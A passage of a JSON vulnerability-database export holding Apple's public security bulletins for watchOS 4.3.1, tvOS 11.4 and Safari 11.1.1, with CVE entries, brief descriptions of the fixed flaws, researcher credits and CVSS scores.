text.\n\nCVE-2018-4198: Hunter Byrnes\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4192: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to an unexpected Safari crash\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4214: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4246: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4201: an anonymous researcher\n\nCVE-2018-4218: natashenka of Google Project Zero\n\nCVE-2018-4233: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: All Apple Watch models\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4222: natashenka of Google Project Zero\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 05, 2021\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-29T00:00:00", "type": "apple", "title": "About the security content of watchOS 4.3.1", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4187", "CVE-2018-4192", "CVE-2018-4194", "CVE-2018-4198", "CVE-2018-4201", "CVE-2018-4206", "CVE-2018-4211", "CVE-2018-4214", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4223", "CVE-2018-4224", "CVE-2018-4225", "CVE-2018-4226", "CVE-2018-4233", "CVE-2018-4235", "CVE-2018-4237", "CVE-2018-4240", "CVE-2018-4241", "CVE-2018-4243", "CVE-2018-4246", "CVE-2018-4249", "CVE-2018-4404", "CVE-2018-5383"], "modified": "2018-05-29T00:00:00", "id": "APPLE:CE6F94AC8696CA2A528378EF9D7F69D6", "href": "https://support.apple.com/kb/HT208851", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-24T20:42:43", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## tvOS 11.4\n\nReleased May 29, 2018\n\n**Bluetooth**\n\nAvailable for: Apple TV 4K\n\nImpact: An attacker in a privileged network position may be able to intercept Bluetooth traffic\n\nDescription: An input validation issue existed in Bluetooth. This issue was addressed with improved input validation.\n\nCVE-2018-5383: Lior Neumann and Eli Biham\n\nEntry added July 23, 2018\n\n**Crash Reporter**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A memory corruption issue was addressed with improved error handling.\n\nCVE-2018-4206: Ian Beer of Google Project Zero\n\n**FontParser**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2018-4211: Proteas of Qihoo 360 Nirvan Team\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4249: Kevin Backhouse of Semmle Ltd.\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2018-4241: Ian Beer of Google Project Zero\n\nCVE-2018-4243: Ian Beer of Google Project Zero\n\n**libxpc**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2018-4237: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**libxpc**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4404: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added August 1, 2019\n\n**LinkPresentation**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted text message may lead to UI spoofing\n\nDescription: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.\n\nCVE-2018-4187: Roman Mueller (@faker_), Zhiyang Zeng (@Wester) of Tencent Security Platform Department\n\nEntry added August 1, 2019\n\n**Messages**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A local user may be able to conduct impersonation attacks\n\nDescription: An injection issue was addressed with improved input validation.\n\nCVE-2018-4235: Anurodh Pokharel of Salesforce.com\n\n**Messages**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted message may lead to a denial of service\n\nDescription: This issue was addressed with improved message validation.\n\nCVE-2018-4240: Sriram (@Sri_Hxor) of PrimeFort Pvt. Ltd\n\n**Security**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A local user may be able to read a persistent device identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4224: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A local user may be able to read a persistent account identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4223: Abraham Masri (@cheesecakeufo)\n\n**UIKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted text file may lead to a denial of service\n\nDescription: A validation issue existed in the handling of text. This issue was addressed with improved validation of text.\n\nCVE-2018-4198: Hunter Byrnes\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Visiting a maliciously crafted website may lead to cookies being overwritten\n\nDescription: A permissions issue existed in the handling of web browser cookies. This issue was addressed with improved restrictions.\n\nCVE-2018-4232: an anonymous researcher, Aymeric Chaib\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4192: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to an unexpected Safari crash\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4214: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4204: found by OSS-Fuzz, Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4246: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2018-4200: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4201: an anonymous researcher\n\nCVE-2018-4218: Natalie Silvanovich of Google Project Zero\n\nCVE-2018-4233: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4188: YoKo Kho (@YoKoAcc) of Mitra Integrasi Informatika, PT\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nCVE-2018-4199: Alex Plaskett, Georgi Geshev, and Fabi Beterke of MWR Labs working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated June 14, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Visiting a maliciously crafted website may leak sensitive data\n\nDescription: Credentials were unexpectedly sent when fetching CSS mask images. This was addressed by using a CORS-enabled fetch method.\n\nCVE-2018-4190: Jun Kokatsu (@shhnjk)\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4222: Natalie Silvanovich of Google Project Zero\n", "edition": 3, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-10-08T03:33:34", "title": "About the security content of tvOS 11.4 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4211", "CVE-2018-4223", "CVE-2018-4188", "CVE-2018-4187", "CVE-2018-4199", "CVE-2018-4224", "CVE-2018-4404", "CVE-2018-4190", "CVE-2018-4233", "CVE-2018-4241", "CVE-2018-4198", "CVE-2018-4237", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4235", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4206", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4249", "CVE-2018-4214", "CVE-2018-4240", "CVE-2018-5383", "CVE-2018-4232", "CVE-2018-4243", "CVE-2018-4200"], "modified": "2019-10-08T03:33:34", "id": "APPLE:HT208850", "href": "https://support.apple.com/kb/HT208850", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-19T19:30:51", "description": "# About the security content of tvOS 11.4\n\nThis document describes the security content of tvOS 11.4.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## tvOS 11.4\n\nReleased May 29, 2018\n\n**Bluetooth**\n\nAvailable for: Apple TV 4K\n\nImpact: An attacker in a privileged network position may be able to intercept Bluetooth traffic\n\nDescription: An input validation issue existed in Bluetooth. This issue was addressed with improved input validation.\n\nCVE-2018-5383: Lior Neumann and Eli Biham\n\nEntry added July 23, 2018\n\n**Crash Reporter**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A memory corruption issue was addressed with improved error handling.\n\nCVE-2018-4206: Ian Beer of Google Project Zero\n\n**FontParser**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted font file may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved validation.\n\nCVE-2018-4211: Proteas of Qihoo 360 Nirvan Team\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4249: Kevin Backhouse of Semmle Ltd.\n\n**Kernel**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with kernel privileges\n\nDescription: A buffer overflow was addressed with improved bounds checking.\n\nCVE-2018-4241: Ian Beer of Google Project Zero\n\nCVE-2018-4243: Ian Beer of Google Project Zero\n\n**libxpc**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to gain elevated privileges\n\nDescription: A logic issue was addressed with improved validation.\n\nCVE-2018-4237: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**libxpc**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: An application may be able to execute arbitrary code with system privileges\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4404: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\nEntry added August 1, 2019\n\n**LinkPresentation**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted text message may lead to UI spoofing\n\nDescription: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.\n\nCVE-2018-4187: Roman Mueller (@faker_), Zhiyang Zeng (@Wester) of Tencent Security Platform Department\n\nEntry added August 1, 2019\n\n**Messages**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A local user may be able to conduct impersonation attacks\n\nDescription: An injection issue was addressed with improved input validation.\n\nCVE-2018-4235: Anurodh Pokharel of Salesforce.com\n\n**Messages**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted message may lead to a denial of service\n\nDescription: This issue was addressed with improved message validation.\n\nCVE-2018-4240: Sriram (@Sri_Hxor) of PrimeFort Pvt. Ltd\n\n**Security**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A local user may be able to read a persistent device identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4224: Abraham Masri (@cheesecakeufo)\n\n**Security**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: A local user may be able to read a persistent account identifier\n\nDescription: An authorization issue was addressed with improved state management.\n\nCVE-2018-4223: Abraham Masri (@cheesecakeufo)\n\n**UIKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing a maliciously crafted text file may lead to a denial of service\n\nDescription: A validation issue existed in the handling of text. This issue was addressed with improved validation of text.\n\nCVE-2018-4198: Hunter Byrnes\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Visiting a maliciously crafted website may lead to cookies being overwritten\n\nDescription: A permissions issue existed in the handling of web browser cookies. This issue was addressed with improved restrictions.\n\nCVE-2018-4232: an anonymous researcher, Aymeric Chaib\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4192: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to an unexpected Safari crash\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4214: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved memory handling.\n\nCVE-2018-4204: found by OSS-Fuzz, Richard Zhu (fluorescence) working with Trend Micro's Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4246: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A memory corruption issue was addressed with improved state management.\n\nCVE-2018-4200: Ivan Fratric of Google Project Zero\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4201: an anonymous researcher\n\nCVE-2018-4218: natashenka of Google Project Zero\n\nCVE-2018-4233: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4188: YoKo Kho (@YoKoAcc) of Mitra Integrasi Informatika, PT\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nCVE-2018-4199: Alex Plaskett, Georgi Geshev, and Fabi Beterke of MWR Labs working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated June 14, 2018\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Visiting a maliciously crafted website may leak sensitive data\n\nDescription: Credentials were unexpectedly sent when fetching CSS mask images. This was addressed by using a CORS-enabled fetch method.\n\nCVE-2018-4190: Jun Kokatsu (@shhnjk)\n\n**WebKit**\n\nAvailable for: Apple TV 4K and Apple TV (4th generation)\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4222: natashenka of Google Project Zero\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 05, 2021\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-29T00:00:00", "type": "apple", "title": "About the security content of tvOS 11.4", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4187", "CVE-2018-4188", "CVE-2018-4190", "CVE-2018-4192", "CVE-2018-4198", "CVE-2018-4199", "CVE-2018-4200", "CVE-2018-4201", "CVE-2018-4204", "CVE-2018-4206", "CVE-2018-4211", "CVE-2018-4214", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4223", "CVE-2018-4224", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4235", "CVE-2018-4237", "CVE-2018-4240", "CVE-2018-4241", "CVE-2018-4243", "CVE-2018-4246", "CVE-2018-4249", "CVE-2018-4404", "CVE-2018-5383"], "modified": "2018-05-29T00:00:00", "id": "APPLE:46FC3BE0AB2D06D5552B4830DD9B604B", "href": "https://support.apple.com/kb/HT208850", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-11T19:30:37", "description": "# About the security content of Safari 11.1.1\n\nThis document describes the security content of Safari 11.1.1.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## Safari 11.1.1\n\nReleased June 1, 2018\n\n**Safari**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: A malicious website may be able to cause a denial of service\n\nDescription: A denial of service issue was addressed with improved validation.\n\nCVE-2018-4247: Fran\u00e7ois Renaud, Jesse Viviano of Verizon Enterprise Solutions\n\n**Safari**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4205: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Visiting a maliciously crafted website may lead to cookies being overwritten\n\nDescription: A permissions issue existed in the handling of web browser cookies. This issue was addressed with improved restrictions.\n\nCVE-2018-4232: an anonymous researcher, Aymeric Chaib\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A type confusion issue was addressed with improved memory handling.\n\nCVE-2018-4246: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A race condition was addressed with improved locking.\n\nCVE-2018-4192: Markus Gaasedelen, Amy Burnett, and Patrick Biernat of Ret2 Systems, Inc working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated October 8, 2019\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: An inconsistent user interface issue was addressed with improved state management.\n\nCVE-2018-4188: YoKo Kho (@YoKoAcc) of Mitra Integrasi Informatika, PT\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to an unexpected Safari crash\n\nDescription: A memory corruption issue was addressed with improved input validation.\n\nCVE-2018-4214: found by OSS-Fuzz\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: Multiple memory corruption issues were addressed with improved memory handling.\n\nCVE-2018-4201: an anonymous researcher\n\nCVE-2018-4218: natashenka of Google Project Zero\n\nCVE-2018-4233: Samuel Gro\u00df (@5aelo) working with Trend Micro\u2019s Zero Day Initiative\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: A buffer overflow issue was addressed with improved memory handling.\n\nCVE-2018-4199: Alex Plaskett, Georgi Geshev, and Fabi Beterke of MWR Labs working with Trend Micro\u2019s Zero Day Initiative\n\nEntry updated June 14, 2018\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Visiting a maliciously crafted website may leak sensitive data\n\nDescription: Credentials were unexpectedly sent when fetching CSS mask images. This was addressed by using a CORS-enabled fetch method.\n\nCVE-2018-4190: Jun Kokatsu (@shhnjk)\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Processing maliciously crafted web content may lead to arbitrary code execution\n\nDescription: An out-of-bounds read was addressed with improved input validation.\n\nCVE-2018-4222: natashenka of Google Project Zero\n\n**WebKit**\n\nAvailable for: OS X El Capitan 10.11.6, macOS Sierra 10.12.6, and macOS High Sierra 10.13.4\n\nImpact: Visiting a malicious website may lead to address bar spoofing\n\nDescription: A spoofing issue existed in the handling of URLs. This issue was addressed with improved input validation.\n\nCVE-2018-4277: xisigr of Tencent's Xuanwu Lab (tencent.com)\n\nEntry added July 10, 2018\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 05, 2021\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-01T00:00:00", "type": "apple", "title": "About the security content of Safari 11.1.1", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-4188", "CVE-2018-4190", "CVE-2018-4192", "CVE-2018-4199", "CVE-2018-4201", "CVE-2018-4205", "CVE-2018-4214", "CVE-2018-4218", "CVE-2018-4222", "CVE-2018-4232", "CVE-2018-4233", "CVE-2018-4246", "CVE-2018-4247", "CVE-2018-4277"], "modified": "2018-06-01T00:00:00", "id": "APPLE:2CC9CC6696C851FEE406173FD30C626B", "href": "https://support.apple.com/kb/HT208854", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, 